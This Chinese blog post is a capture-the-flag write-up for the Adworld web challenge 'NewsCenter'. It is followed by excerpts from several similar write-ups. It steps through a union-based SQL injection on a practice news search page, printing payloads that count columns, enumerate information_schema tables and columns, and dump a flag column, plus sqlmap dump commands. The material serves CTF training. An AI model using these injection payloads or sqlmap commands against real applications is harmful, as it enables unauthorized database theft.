攻防世界_NewsCenter

最新推荐文章于 2025-03-09 22:31:52 发布
最新推荐文章于 2025-03-09 22:31:52 发布
阅读量303 收藏
点赞数 3
分类专栏: CTF 文章标签: 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44959263/article/details/120414580
版权
本文介绍了一个实际的SQL注入攻击过程,包括发现漏洞、确定注入点、查找表名和列名,最终获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

访问目标地址,发现是一个叫做黑客新闻的页面

在这里插入图片描述

随便输入了一下,发现是一个post传输的参数,并且明文传输,初步判断可能存在注入

在这里插入图片描述

加入一个单引号看一下,可以发现确实报错了

在这里插入图片描述
再在后面加入#试一下

在这里插入图片描述

可以发现确实是存在注入的,且第一个单引号闭合了输入逻辑,#注释掉了后面的单引号,试着找一下字段数吧

在这里插入图片描述
在这里插入图片描述

asd'union select 1,2,3 #			使用该语句时未报错,当数字为1或者1,2时报错,得出字段数为3

在这里插入图片描述

看页面回显发现,能够显示的位置为,二号位和三号位,之后可以在二号位和三号位输入执行语句

asd' union select 1,2,table_name from information_schema.tables #		查询表

在这里插入图片描述

asd' union select 1,column_type,column_name from information_schema.columns where table_name='secret_table' #		利用information_schema.columns的结构来获得secret表的信息,在二号位加上字段类型

在这里插入图片描述

现在已经确认了flag确实存在在这个位置,直接用表和字段来确认即可

asd' union select 1,2,fl4g from secret_table #

在这里插入图片描述

成功得到flag!

攻防世界-NewsCenter
weixin_46784800的博客
11-12 1628
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 580
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:user@10.42.101.146 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界web:NewsCenter(含sqlmap基本参数讲解)
最新发布
2203_75647316的博客
03-09 558
CTF中web方向sql注入的题目,包含一些sqlmap的参数讲解
攻防世界 WEB NewsCenter
diepangan3893的博客
09-23 526
  前几天才发现攻防世界这个平台,真是相见恨晚,正愁没地方检验自己大学四年学安全的学习成果,于是沉浸于寻找flag,大概一天一到两题的进度(解完两题就学别的去了,尽管如此也挺慢的了)在解题的同时也总结了安全的方方面面,各种工具和用法、各种漏洞的判断和利用.....最近终于磕磕绊绊做完了web的新手练习,怀着兴奋又紧张的心情进了高手进阶,扑面而来就是两页题,选了1分里名字最直白的一个——N...
攻防世界NewsCenter
weixin_51030879的博客
07-23 1306
攻防世界NewsCenter
攻防世界NewsCenter
金 帛的博客
04-09 3350
攻防世界WP
攻防世界---NewsCenter
weixin_43803070的博客
07-15 538
废话不多说,直接上思路。 ** 手工注入: ** 1' //报错, 判断字段: 1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。 回显字段: -1' union select 1,2,3# 爆出数据库(两种方法): -1' union select 1,2,database()# -1' union select 1,2,group_conc...
攻防世界 newscenter
09-08
攻防世界NewsCenter一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...
攻防世界 WEB newscenter
qq_41696858的博客
08-03 351
看到提交框就条件反射sql注入 先sqlmap跑,能跑的情况下优先 把burpsuite抓到的包保存为1.txt sqlmap -l 1.txt sqlmap -l 1.txt --dbs sqlmap -l 1.txt -D news --tables sqlmap -l 1.txt -D news -T secret_tables --columns --dump 一套组合拳打完,成功拿到flag 当然可以自己手工注入 ' and 0 union select 1,table_schema,tabl
攻防世界NewsCenter
weixin_52268949的博客
01-23 866
NewsCenter 打开题目是一个搜索框我们首先尝试一下sql注入 判断了一下是使用’'进行包裹的字符型sql注入 然后我们需要判断数据库列数 1' order by 3# 回显正常但by4的时候回显就不正常了 所以判断数据库有三列 下面就是一些常规操作了,首先看看回显位 -1' union select 1,2,3# 写-1的原因是不要让正常数据影响到我们注入测出的结果 测试数据库 -1' union select 1,2,group_concat(schema_name) from info
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1652
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界-web-newscenter
wuh2333的博客
05-30 1164
攻防世界sql注入
攻防世界---web---NewsCenter
2201_75556700的博客
05-18 879
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界 - NewsCenter - WriteUp
热门推荐
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界wp-newscenter
weixin_43916608的博客
07-21 291
根据搜索条件,考虑题目为sql注入 1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#,查看数据库返回列数 查询结果说明,数据库返回的列数为3 2.查询数据库名称 ’ and 0 union select 1,2,table_schema from information_schema.tables#,查询结果可知,数...
攻防世界-web-NewsCenter(wp)
2301_80241182的博客
11-04 343
union后的第2、3列被显示出来,接下来就是正常的union注入。那就确定union后面需要跟三个元素。没报错直到4的时候报错。查取fl4g的字段内容。
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 2467
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值